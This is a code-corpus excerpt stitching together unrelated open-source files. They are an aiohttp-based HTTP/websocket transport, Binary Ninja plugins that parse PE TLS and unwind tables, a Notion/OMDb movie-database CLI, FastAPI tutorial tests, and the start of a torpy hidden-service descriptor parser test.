))
return
context['_http_open_websockets'] = context.get('_http_open_websockets', [])
context['_http_open_websockets'].append(websocket)
if access_log:
logging.getLogger('transport.http').info('[{}] {} {} "OPEN {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 101),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'-'
))
result = compiled_pattern.match(request.path)
values = inspect.getfullargspec(func)
kwargs = {k: values.defaults[i] for i, k in enumerate(values.args[len(values.args) - len(values.defaults):])} if values.defaults else {}
if result:
for k, v in result.groupdict().items():
kwargs[k] = v
if len(values.args) - (len(values.defaults) if values.defaults else 0) >= 3:
# If the function takes a third required argument the value will be filled with the request object
a = a + (request,)
if 'request' in values.args and (len(values.args) - (len(values.defaults) if values.defaults else 0) < 3 or values.args[2] != 'request'):
kwargs['request'] = request
try:
routine = func(*(obj, websocket, *a), **merge_dicts(kwargs, kw))
callback_functions = (await routine) if isinstance(routine, Awaitable) else routine # type: Optional[Union[Tuple, Callable]]
except Exception as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
try:
await websocket.close()
except Exception:
pass
try:
context['_http_open_websockets'].remove(websocket)
except Exception:
pass
if access_log:
logging.getLogger('transport.http').info('[{}] {} {} "{} {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 500),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
RequestHandler.colorize_status('ERROR', 500),
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'-'
))
return
_receive_func = None
_close_func = None
if callback_functions and isinstance(callback_functions, tuple):
try:
_receive_func, _close_func = callback_functions
except ValueError:
_receive_func, = callback_functions
elif callback_functions:
_receive_func = callback_functions
try:
async for message in websocket:
if message.type == WSMsgType.TEXT:
if _receive_func:
try:
await _receive_func(message.data)
except Exception as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
elif message.type == WSMsgType.ERROR:
if not context.get('log_level') or context.get('log_level') in ['DEBUG']:
ws_exception = websocket.exception()
if isinstance(ws_exception, (EofStream, RuntimeError)):
pass
elif isinstance(ws_exception, Exception):
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(ws_exception)))
else:
logging.getLogger('transport.http').warning('Websocket exception: "{}"'.format(ws_exception))
elif message.type == WSMsgType.CLOSED:
break # noqa
except Exception as e:
pass
finally:
if _close_func:
try:
await _close_func()
except Exception as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
try:
await websocket.close()
except Exception:
pass
try:
context['_http_open_websockets'].remove(websocket)
except Exception:
pass
return await cls.request_handler(cls, obj, context, _func, 'GET', url, pre_handler_func=_pre_handler_func)
async def start_server(obj: Any, context: Dict) -> Optional[Callable]:
if context.get('_http_server_started'):
return None
context['_http_server_started'] = True
server_header = context.get('options', {}).get('http', {}).get('server_header', 'tomodachi')
access_log = context.get('options', {}).get('http', {}).get('access_log', True)
logger_handler = None
if isinstance(access_log, str):
try:
wfh = WatchedFileHandler(filename=access_log)
except FileNotFoundError as e:
logging.getLogger('transport.http').warning('Unable to use file for access log - invalid path ("{}")'.format(access_log))
raise HttpException(str(e)) from e
except PermissionError as e:
logging.getLogger('transport.http').warning('Unable to use file for access log - invalid permissions ("{}")'.format(access_log))
raise HttpException(str(e)) from e
wfh.setLevel(logging.DEBUG)
logging.getLogger('transport.http').setLevel(logging.DEBUG)
logging.getLogger('transport.http').info('Logging to "{}"'.format(access_log))
logger_handler = wfh
logging.getLogger('transport.http').addHandler(logger_handler)
async def _start_server() -> None:
loop = asyncio.get_event_loop()
logging.getLogger('aiohttp.access').setLevel(logging.WARNING)
@web.middleware
async def middleware(request: web.Request, handler: Callable) -> web.Response:
async def func() -> web.Response:
request_ip = RequestHandler.get_request_ip(request, context)
if request.headers.get('Authorization'):
try:
request._cache['auth'] = BasicAuth.decode(request.headers.get('Authorization'))
except ValueError:
pass
if access_log:
timer = time.time()
response = web.Response(status=503, # type: ignore
headers={}) # type: web.Response
try:
response = await handler(request)
response.headers[hdrs.SERVER] = server_header or ''
except web.HTTPException as e:
error_handler = context.get('_http_error_handler', {}).get(e.status, None)
if error_handler:
response = await error_handler(request)
response.headers[hdrs.SERVER] = server_header or ''
else:
response = e
response.headers[hdrs.SERVER] = server_header or ''
response.body = str(e).encode('utf-8')
except Exception as e:
error_handler = context.get('_http_error_handler', {}).get(500, None)
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
if error_handler:
response = await error_handler(request)
response.headers[hdrs.SERVER] = server_header or ''
else:
response = web.HTTPInternalServerError() # type: ignore
response.headers[hdrs.SERVER] = server_header or ''
response.body = b''
finally:
if not request.transport:
response = web.Response(status=499, # type: ignore
headers={}) # type: web.Response
response._eof_sent = True
if access_log:
request_time = time.time() - timer
version_string = None
if isinstance(request.version, HttpVersion):
version_string = 'HTTP/{}.{}'.format(request.version.major, request.version.minor)
if not request._cache.get('is_websocket'):
status_code = response.status if response is not None else 500
ignore_logging = getattr(handler, 'ignore_logging', False)
if ignore_logging is True:
pass
elif isinstance(ignore_logging, (list, tuple)) and status_code in ignore_logging:
pass
else:
logging.getLogger('transport.http').info('[{}] [{}] {} {} "{} {}{}{}" {} {} "{}" {}'.format(
RequestHandler.colorize_status('http', status_code),
RequestHandler.colorize_status(status_code),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.method,
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
' {}'.format(version_string) if version_string else '',
response.content_length if response is not None and response.content_length is not None else '-',
request.content_length if request.content_length is not None else '-',
request.headers.get('User-Agent', '').replace('"', ''),
'{0:.5f}s'.format(round(request_time, 5))
))
else:
logging.getLogger('transport.http').info('[{}] {} {} "CLOSE {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 101),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'{0:.5f}s'.format(round(request_time, 5))
))
if isinstance(response, (web.HTTPException, web.HTTPInternalServerError)):
raise response
return response
return await asyncio.shield(func())
app = web.Application(middlewares=[middleware], # type: ignore
client_max_size=(1024 ** 2) * 100) # type: web.Application
app._set_loop(None) # type: ignore
for method, pattern, handler, route_context in context.get('_http_routes', []):
try:
compiled_pattern = re.compile(pattern)
except re.error as exc:
raise ValueError(
"Bad pattern '{}': {}".format(pattern, exc)) from None
ignore_logging = route_context.get('ignore_logging', False)
setattr(handler, 'ignore_logging', ignore_logging)
resource = DynamicResource(compiled_pattern)
app.router.register_resource(resource) # type: ignore
if method.upper() == 'GET':
resource.add_route('HEAD', handler, expect_handler=None) # type: ignore
resource.add_route(method.upper(), handler, expect_handler=None) # type: ignore
port = context.get('options', {}).get('http', {}).get('port', 9700)
host = context.get('options', {}).get('http', {}).get('host', '0.0.0.0')
try:
app.freeze()
server_task = loop.create_server(Server(app._handle, request_factory=app._make_request, server_header=server_header or '', access_log=access_log, keepalive_timeout=0, tcp_keepalive=False), host, port) # type: ignore
server = await server_task # type: ignore
except OSError as e:
error_message = re.sub('.*: ', '', e.strerror)
logging.getLogger('transport.http').warning('Unable to bind service [http] to http://{}:{}/ ({})'.format('127.0.0.1' if host == '0.0.0.0' else host, port, error_message))
raise HttpException(str(e), log_level=context.get('log_level')) from e
port = int(server.sockets[0].getsockname()[1])
context['_http_port'] = port
stop_method = getattr(obj, '_stop_service', None)
async def stop_service(*args: Any, **kwargs: Any) -> None:
if stop_method:
await stop_method(*args, **kwargs)
open_websockets = context.get('_http_open_websockets', [])[:]
for websocket in open_websockets:
try:
await websocket.close()
except Exception:
pass
server.close()
await app.shutdown()
if logger_handler:
logging.getLogger('transport.http').removeHandler(logger_handler)
await app.cleanup()
setattr(obj, '_stop_service', stop_service)
for method, pattern, handler, route_context in context.get('_http_routes', []):
for registry in getattr(obj, 'discovery', []):
if getattr(registry, 'add_http_endpoint', None):
await registry.add_http_endpoint(obj, host, port, method, pattern)
logging.getLogger('transport.http').info('Listening [http] on http://{}:{}/'.format('127.0.0.1' if host == '0.0.0.0' else host, port))
return _start_server
async def resolve_response(value: Union[str, bytes, Dict, List, Tuple, web.Response, Response], request: Optional[web.Request] = None, context: Dict = None, status_code: Optional[Union[str, int]] = None, default_content_type: Optional[str] = None, default_charset: Optional[str] = None) -> web.Response:
if not context:
context = {}
if isinstance(value, Response):
return value.get_aiohttp_response(context, default_content_type=default_content_type, default_charset=default_charset)
if isinstance(value, web.FileResponse):
return value
status = int(status_code) if status_code else (request is not None and request._cache.get('error_status_code', 200)) or 200
headers = None
if isinstance(value, dict):
body = value.get('body')
_status = value.get('status') # type: Optional[SupportsInt]
if _status and isinstance(_status, (int, str, bytes)):
status = int(_status)
_returned_headers = value.get('headers')
if _returned_headers:
returned_headers = _returned_headers # type: Union[Mapping[str, Any], Iterable[Tuple[str, Any]]]
headers = CIMultiDict(returned_headers)
elif isinstance(value, list) or isinstance(value, tuple):
_status = value[0]
if _status and isinstance(_status, (int, str, bytes)):
status = int(_status)
body = value[1]
if len(value) > 2:
returned_headers = value[2]
headers = CIMultiDict(returned_headers)
elif isinstance(value, web.Response):
return value
else:
if value is None:
value = ''
body = value
return Response(body=body, status=status, headers=headers, content_type=default_content_type, charset=default_charset).get_aiohttp_response(context)
async def get_http_response_status(value: Union[str, bytes, Dict, List, Tuple, web.Response, Response, Exception], request: Optional[web.Request] = None, verify_transport: bool = True) -> Optional[int]:
if isinstance(value, Exception) or isinstance(value, web.HTTPException):
status_code = int(getattr(value, 'status', 500)) if value is not None else 500
return status_code
else:
response = await resolve_response(value, request=request)
status_code = int(response.status) if response is not None else 500
if verify_transport and request is not None and request.transport is None:
return 499
else:
return status_code
http = HttpTransport.decorator(HttpTransport.request_handler)
http_error = HttpTransport.decorator(HttpTransport.error_handler)
http_static = HttpTransport.decorator(HttpTransport.static_request_handler)
websocket = HttpTransport.decorator(HttpTransport.websocket_handler)
ws = HttpTransport.decorator(HttpTransport.websocket_handler)
``` |
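As `resolve_response` above shows, a handler may return several shapes: a plain `str`/`bytes` body, a `dict` with optional `status` and `headers` keys, a `(status, body[, headers])` tuple, a `tomodachi` `Response`, or a raw `aiohttp` response. Hypothetical handlers illustrating the equivalent forms:

```python
@http('GET', r'/text/?')
async def as_text(self, request):
    return 'hello'  # 200 with the configured default content type and charset

@http('GET', r'/dict/?')
async def as_dict(self, request):
    return {'body': 'created', 'status': 201, 'headers': {'X-Demo': '1'}}

@http('GET', r'/tuple/?')
async def as_tuple(self, request):
    return 404, 'not found'
```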
{
"source": "0x1F9F1/binja-msvc",
"score": 2
} |
#### File: 0x1F9F1/binja-msvc/tls.py
```python
from binaryninja import Symbol, Type, log
from binaryninja.enums import SymbolType
from .utils import BinjaStruct, read_pe_header, check_address
IMAGE_TLS_DIRECTORY32_t = BinjaStruct('<IIIIII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
IMAGE_TLS_DIRECTORY64_t = BinjaStruct('<QQQQII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
def read_tls_directory(view, address):
if view.address_size == 4:
image_tls_directory_t = IMAGE_TLS_DIRECTORY32_t
elif view.address_size == 8:
image_tls_directory_t = IMAGE_TLS_DIRECTORY64_t
else:
raise NotImplementedError()
tls_directory, address = image_tls_directory_t.read(view, address)
return tls_directory, address
def label_tls(view):
pe = read_pe_header(view)
tls_data_directory = pe.OPTIONAL_HEADER.DATA_DIRECTORY[9]
if tls_data_directory.Size:
tls_directory, _ = read_tls_directory(view, view.start + tls_data_directory.VirtualAddress)
if tls_directory is not None:
tls_start_address = tls_directory['StartAddressOfRawData']
tls_end_address = tls_directory['EndAddressOfRawData']
if (tls_start_address < tls_end_address) and check_address(view, tls_start_address) and check_address(view, tls_end_address):
log.log_info('TLS Data @ 0x{0:X}'.format(tls_start_address))
view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_start_address, 'TlsData'))
view.define_user_data_var(tls_start_address, Type.array(Type.int(1, sign = False), tls_end_address - tls_start_address))
tls_index_address = tls_directory['AddressOfIndex']
if check_address(view, tls_index_address):
log.log_info('TLS Index @ 0x{0:X}'.format(tls_index_address))
view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_index_address, 'TlsIndex'))
view.define_user_data_var(tls_index_address, Type.int(4, sign = False))
```
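`BinjaStruct` comes from the plugin's `utils` module and pairs a `struct` format string with field names. A rough sketch of the reader interface used above (the real helper also takes an alignment argument and does more validation):

```python
import struct

class BinjaStruct:
    # Sketch: wrap struct.Struct and return named fields plus the next address.
    def __init__(self, fmt, names=None):
        self.struct = struct.Struct(fmt)
        self.names = names

    def read(self, view, address, align=1):  # align accepted but ignored here
        data = view.read(address, self.struct.size)
        if len(data) != self.struct.size:
            return None, address
        values = self.struct.unpack(data)
        result = dict(zip(self.names, values)) if self.names else values
        return result, address + self.struct.size
```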
#### File: 0x1F9F1/binja-msvc/unwind.py
```python
from binaryninja import log
from .utils import BinjaStruct, read_pe_header, split_bits, update_percentage
# https://msdn.microsoft.com/en-us/library/ft9x1kdx.aspx
RUNTIME_FUNCTION_t = BinjaStruct('<III', names = ('BeginAddress', 'EndAddress', 'UnwindData'))
def read_runtime_function(view, address):
runtime_function, address = RUNTIME_FUNCTION_t.read(view, address, 4)
if runtime_function is not None:
runtime_function['BeginAddress'] += view.start
runtime_function['EndAddress'] += view.start
runtime_function['UnwindData'] += view.start
return runtime_function, address
UNWIND_INFO_t = BinjaStruct('<BBBB', names = ('VersionAndFlags', 'SizeOfProlog', 'CountOfCodes', 'FrameRegisterAndOffset'))
UNW_FLAG_NHANDLER = 0x0
UNW_FLAG_EHANDLER = 0x1
UNW_FLAG_UHANDLER = 0x2
UNW_FLAG_FHANDLER = 0x3
UNW_FLAG_CHAININFO = 0x4
def read_unwind_info(view, address):
unwind_info, address = UNWIND_INFO_t.read(view, address)
if unwind_info is not None:
split_bits(unwind_info, 'VersionAndFlags', [
('Version', 0, 3),
('Flags', 3, 5)
])
split_bits(unwind_info, 'FrameRegisterAndOffset', [
('FrameRegister', 0, 4),
('FrameOffset', 4, 4)
])
if unwind_info['Version'] == 1:
unwind_codes = [ ]
for i in range(unwind_info['CountOfCodes']):
unwind_code, address = read_unwind_code(view, address)
unwind_codes.append(unwind_code)
unwind_info['UnwindCodes'] = unwind_codes
if unwind_info['Flags'] & UNW_FLAG_CHAININFO:
unwind_info['FunctionEntry'], address = read_runtime_function(view, address)
return unwind_info, address
UNWIND_CODE_t = BinjaStruct('<BB', names = ('CodeOffset', 'UnwindOpAndInfo'))
def read_unwind_code(view, address):
unwind_code, address = UNWIND_CODE_t.read(view, address)
if unwind_code is not None:
split_bits(unwind_code, 'UnwindOpAndInfo', [
('UnwindOp', 0, 4),
('OpInfo', 4, 4)
])
return unwind_code, address
def parse_unwind_info(thread, view):
base_address = view.start
pe = read_pe_header(view)
unwind_directory = pe.OPTIONAL_HEADER.DATA_DIRECTORY[3]
unwind_entrys = base_address + unwind_directory.VirtualAddress
unwind_entrys_end = unwind_entrys + unwind_directory.Size
funcs = set()
log.log_info('Exception Data @ 0x{0:X} => 0x{1:X}'.format(unwind_entrys, unwind_entrys_end))
for runtime_address in range(unwind_entrys, unwind_entrys_end, 12):
if thread.cancelled:
break
update_percentage(thread, unwind_entrys, unwind_entrys_end, runtime_address, 'Parsing Unwind Info - Found {0} functions'.format(len(funcs)))
runtime_function, _ = read_runtime_function(view, runtime_address)
if runtime_function is None:
continue
start_address = runtime_function['BeginAddress']
if not view.is_offset_executable(start_address):
continue
if view.get_functions_containing(start_address):
continue
info_address = runtime_function['UnwindData']
unwind_info, _ = read_unwind_info(view, info_address)
if unwind_info is None:
continue
if 'FunctionEntry' in unwind_info:
continue
funcs.add(start_address)
if not thread.cancelled:
thread.progress = 'Creating {0} Functions'.format(len(funcs))
log.log_info('Found {0} functions'.format(len(funcs)))
for func in funcs:
view.create_user_function(func)
``` |
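`split_bits`, also from `utils`, expands a packed integer field into named sub-fields given `(name, offset, width)` tuples. A minimal compatible implementation could be:

```python
def split_bits(values, key, fields):
    # Sketch: unpack bitfields from values[key] into named entries.
    packed = values[key]
    for name, offset, width in fields:
        values[name] = (packed >> offset) & ((1 << width) - 1)

# e.g. VersionAndFlags == 0x21 yields Version == 1 and Flags == UNW_FLAG_CHAININFO (0x4)
```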
{
"source": "0x1za/notflix",
"score": 2
} |
#### File: 0x1za/notflix/app.py
```python
import os
import json
import click
import requests
import inquirer
import sentry_sdk
from absl import logging
from dotenv import load_dotenv
load_dotenv() # take environment variables from .env.
# Code of your application, which uses environment variables (e.g. from `os.environ` or
# `os.getenv`) as if they came from the actual environment.
sentry_sdk.init(
os.getenv("SENTRY_DSN"),
# Set traces_sample_rate to 1.0 to capture 100%
# of transactions for performance monitoring.
# We recommend adjusting this value in production.
traces_sample_rate=1.0)
@click.command()
@click.option("--title",
prompt="Movie title",
help="Movie title to search for.")
def app(title):
"""Simple program that populates your Notion movie database for you and
your significant other.
"""
results = omdb_get_movie(title)
imdb_ids = json_extract(results, "imdbID")
if results["Response"] != "False":
titles = merge_titles(
json_extract(results, "Title"),
json_extract(results, "Year"),
json_extract(results, "Type"),
)
questions = [
inquirer.List(
"movie",
message="Select movie from search results...",
choices=results_tuple(titles, imdb_ids),
),
]
answers = inquirer.prompt(questions)
movie = omdb_get_movie(answers["movie"], by_id=True)
# Check if movie is already in Notion database table.
exists = search_database(movie["imdbID"], "IMDb ID")["results"]
if len(exists) == 0:
create_notion_entry(movie)
elif len(exists) == 1:
logging.warning('Skipping, entry already exists in database.')
else:
logging.fatal(
"Something went wrong... extry might already exist in database"
)
else:
logging.warning("Results list is empty, exiting")
return None
def search_database(query, key):
url = "https://api.notion.com/v1/databases/" + str(
os.getenv("NOTION_DATABASE_ID")) + "/query"
payload = json.dumps(
{"filter": {
"property": str(key),
"text": {
"equals": str(query)
}
}})
headers = {
'Notion-Version': '2021-08-16',
'Authorization': os.getenv("NOTION_INTEGRATION_SECRET_KEY"),
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.json()
def create_notion_entry(data):
url = "https://api.notion.com/v1/pages"
payload = json.dumps({
"parent": {
"database_id": os.getenv("NOTION_DATABASE_ID")
},
"properties": {
"title": {
"title": [{
"text": {
"content": "" + str(data["Title"]) + ""
}
}]
},
"IMDb ID": {
"rich_text": [{
"text": {
"content": "" + str(data["imdbID"]) + ""
}
}]
},
"Plot": {
"rich_text": [{
"text": {
"content": "" + str(data["Plot"]) + ""
}
}]
},
"Year": {
"rich_text": [{
"text": {
"content": "" + str(data["Year"]) + ""
}
}]
},
"Run Time": {
"rich_text": [{
"text": {
"content": "" + str(data["Runtime"]) + ""
}
}]
},
"Genre": {
"multi_select":
generate_multi_select(data["Genre"].split(", "))
},
"Cast": {
"multi_select":
generate_multi_select(data["Actors"].split(", "))
},
"Star Rating": {
"select": {
"name": score_to_stars(data["imdbRating"])
}
}
}
})
headers = {
'Notion-Version': '2021-08-16',
'Authorization': os.getenv("NOTION_INTEGRATION_SECRET_KEY"),
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.status_code
def score_to_stars(score):
    # Score based on the IMDb rating system.
    stars = None
    if score != "N/A":
        # Divide score; IMDb rating is out of 10, convert to 5 stars
        score = float(score) / 2
        if 0 < score <= 1:
            stars = "⭐"
        elif score <= 2:
            stars = "⭐⭐"
        elif score <= 3:
            stars = "⭐⭐⭐"
        elif score <= 4:
            stars = "⭐⭐⭐⭐"
        elif score <= 5:
            stars = "⭐⭐⭐⭐⭐"
        else:
            stars = score
    return stars
def results_tuple(titles, ids):
results = []
for idx, item in enumerate(titles):
results.append((item, ids[idx]))
return results
def merge_titles(titles, years, types):
results = []
for idx, item in enumerate(titles):
results.append(item + " (" + str(years[idx]) + ") - " +
str(types[idx]))
return results
def generate_multi_select(array):
result = []
for item in array:
result.append({"name": str(item)})
return result
def json_extract(obj, key):
"""Recursively fetch values from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively search for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
values = extract(obj, arr, key)
return values
def omdb_get_movie(query, by_id=False):
if by_id is False:
param = "s"
else:
param = "i"
url = ("https://www.omdbapi.com/?apikey=" + str(os.getenv("OMDB_KEY")) +
"&" + str(param) + "=" + str(query))
payload = {}
headers = {}
response = requests.request("GET", url, headers=headers, data=payload)
return response.json()
if __name__ == "__main__":
app()
``` |
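`json_extract` recursively walks the nested OMDb response and collects every value stored under a given key, which is how the search results are flattened into parallel lists above. A quick illustration with a made-up payload in the OMDb search shape:

```python
sample = {"Search": [
    {"Title": "Dune", "Year": "2021", "imdbID": "tt1160419", "Type": "movie"},
    {"Title": "Dune", "Year": "1984", "imdbID": "tt0087182", "Type": "movie"},
]}
assert json_extract(sample, "imdbID") == ["tt1160419", "tt0087182"]
assert json_extract(sample, "Year") == ["2021", "1984"]
```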
{
"source": "0x20bf-org/fastapi",
"score": 2
} |
#### File: test_tutorial/test_body_multiple_params/test_tutorial001.py
```python
import pytest
from docs_src.body_multiple_params.tutorial001 import app
from fastapi.testclient import TestClient
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/items/{item_id}": {
"put": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"summary": "Update Item",
"operationId": "update_item_items__item_id__put",
"parameters": [
{
"required": True,
"schema": {
"title": "The ID of the item to get",
"maximum": 1000.0,
"minimum": 0.0,
"type": "integer",
},
"name": "item_id",
"in": "path",
},
{
"required": False,
"schema": {"title": "Q", "type": "string"},
"name": "q",
"in": "query",
},
],
"requestBody": {
"content": {
"application/json": {
"schema": {"$ref": "#/components/schemas/Item"}
}
}
},
}
}
},
"components": {
"schemas": {
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
"description": {"title": "Description", "type": "string"},
"tax": {"title": "Tax", "type": "number"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"type": "string"},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
def test_openapi_schema():
response = client.get("/openapi.json")
assert response.status_code == 200, response.text
assert response.json() == openapi_schema
item_id_not_int = {
"detail": [
{
"loc": ["path", "item_id"],
"msg": "value is not a valid integer",
"type": "type_error.integer",
}
]
}
@pytest.mark.parametrize(
"path,body,expected_status,expected_response",
[
(
"/items/5?q=bar",
{"name": "Foo", "price": 50.5},
200,
{
"item_id": 5,
"item": {
"name": "Foo",
"price": 50.5,
"description": None,
"tax": None,
},
"q": "bar",
},
),
("/items/5?q=bar", None, 200, {"item_id": 5, "q": "bar"}),
("/items/5", None, 200, {"item_id": 5}),
("/items/foo", None, 422, item_id_not_int),
],
)
def test_post_body(path, body, expected_status, expected_response):
response = client.put(path, json=body)
assert response.status_code == expected_status
assert response.json() == expected_response
```
#### File: test_tutorial/test_metadata/test_tutorial001.py
```python
from docs_src.metadata.tutorial001 import app
from fastapi.testclient import TestClient
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {
"title": "ChimichangApp",
"description": "\nChimichangApp API helps you do awesome stuff. 🚀\n\n## Items\n\nYou can **read items**.\n\n## Users\n\nYou will be able to:\n\n* **Create users** (_not implemented_).\n* **Read users** (_not implemented_).\n",
"termsOfService": "http://example.com/terms/",
"contact": {
"name": "<NAME>",
"url": "http://x-force.example.com/contact/",
"email": "<EMAIL>",
},
"license": {
"name": "Apache 2.0",
"url": "https://www.apache.org/licenses/LICENSE-2.0.html",
},
"version": "0.0.1",
},
"paths": {
"/items/": {
"get": {
"summary": "Read Items",
"operationId": "read_items_items__get",
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
}
},
}
}
},
}
def test_openapi_schema():
response = client.get("/openapi.json")
assert response.status_code == 200, response.text
assert response.json() == openapi_schema
def test_items():
response = client.get("/items/")
assert response.status_code == 200, response.text
assert response.json() == [{"name": "Katana"}]
``` |
{
"source": "0x20bf-org/tor",
"score": 2
} |
#### File: tests/unittest/test_parsers.py
```python
import pytest
from torpy.parsers import HSDescriptorParser, IntroPointParser, RouterDescriptorParser
@pytest.fixture
def hs_example():
return """rendezvous-service-descriptor aj7trvc2tuggkzsffrbla3qogs2plltf
version 2
permanent-key
-----BEGIN RSA PUBLIC KEY-----
<KEY>
-----END RSA PUBLIC KEY-----
secret-id-part jrhhuswdnmpplrlflxc4buquuzijljkr
publication-time 2019-03-20 06:00:00
protocol-versions 2,3
introduction-points
-----BEGIN MESSAGE-----
aW<KEY>aW9uLXBvaW50IGt4eGlxenU2YnI0cGg1ZmgybzN1eHh3ZnNjaGpy
a282CmlwLWFkZHJlc3MgMjE3LjIzLjcuMTAzCm9uaW9uLXBvcnQgOTAwMQpvbmlv
bi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU9E
dG9TajZreUh6WHN4enhwVDgvOGFpV2hCcmVMdGFMbjZybGJhRjUwRnVQWkY5azVG
ZGhnMDAKNjFWbHc1djUzVHlWTFJST042Mkt5TlJZT1o5NWd1V2FEajBDVDBMbCtE
Qzh5OU5ORk83Zk02SG1hR1pkYTlnYwpxYkRtK2JET1JTSHVmd2FzWTNSVHlEVW5H
TWFpSXpxeDJna0l4dEI1TituTkk4eERDVFlEQWdNQkFBRT0KLS0tLS1FTkQgUlNB
IFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJM
SUMgS0VZLS0tLS0KTUlHSkFvR0JBTGNHRGZzcVBObzNKcFpIMjVMcnd4bDNGeWZt
VExKUGdtRUh5KzcvcUJ0eVlBTEp1cC9McGRxcQpRcjkraTBpcFdLcWs3cG5TUi9w
aFo4S3pnR1lnVGJWUDZyV2NGQXZvWEhQWXVmc1d6OVp2SGY3N0drYVZZSTJSCkVq
TEtaL1FMRG9rYVFKOFpHeWNpUnJ3ZHlRdHMyTUxZc00rRUQ3bmhHZzdtR2N2eWZC
SWZBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVj
dGlvbi1wb2ludCB5bjN4NG9scTdsYm1ic3ptanlsZ29ybmhvemliZ2V5ZQppcC1h
ZGRyZXNzIDk0LjIzLjE1MC44MQpvbmlvbi1wb3J0IDQ0Mwpvbmlvbi1rZXkKLS0t
LS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU94ajNzT2syb3g3
dzU5aXdhejl6WHc2UktvdjJXYUh6TWVvbjBiWlVVQXVHcWlKT01ONEt3RkQKMlNS
LzBrSUY1UjIyV3I4a2x0cXQxbWlTY0tvWk9KU2MrYXVVVjR6TXl2NmE5bnl2cXJt
amhDYWJqSlFoQ0M4VQpoT3ZrL2N3K1MvZHZnQXFGTkdnTzNHV0RrSnI3bC9BTXh5
alhVa1FKYnVjb1JiWGkwbU56QWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBL
RVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0t
LS0KTUlHSkFvR0JBTVJDYWJHdWI3Mk1xSndqMHJXRnArZW5xSzRzMVBEeGZUVDUx
Zmcwdkd0bStxM1E0azFtUm1tVApiNkc3OTNNOVV6WnN4dVNKbDRSOVJyZEJaM1pt
OGRmMDU2cEUvSmJ0Q2NWVnlPb0daZlVsWHhXaDM0c2RZdU4xCkZGb1Iva0JlLzBF
aWtBSWI5eGsyS001SjlKMGEyc1A0UTNhL2NGOWJkNjhpMWlaSmIySWhBZ01CQUFF
PQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVjdGlvbi1wb2lu
dCBoemo1aGY0NXdiN3AyNDNnbWhldGppbzYyZmFzcG51ZQppcC1hZGRyZXNzIDIx
Ny43OS4xNzkuMTc3Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJ
TiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU5xY2R0YTQvOUFFYzkyMjJx
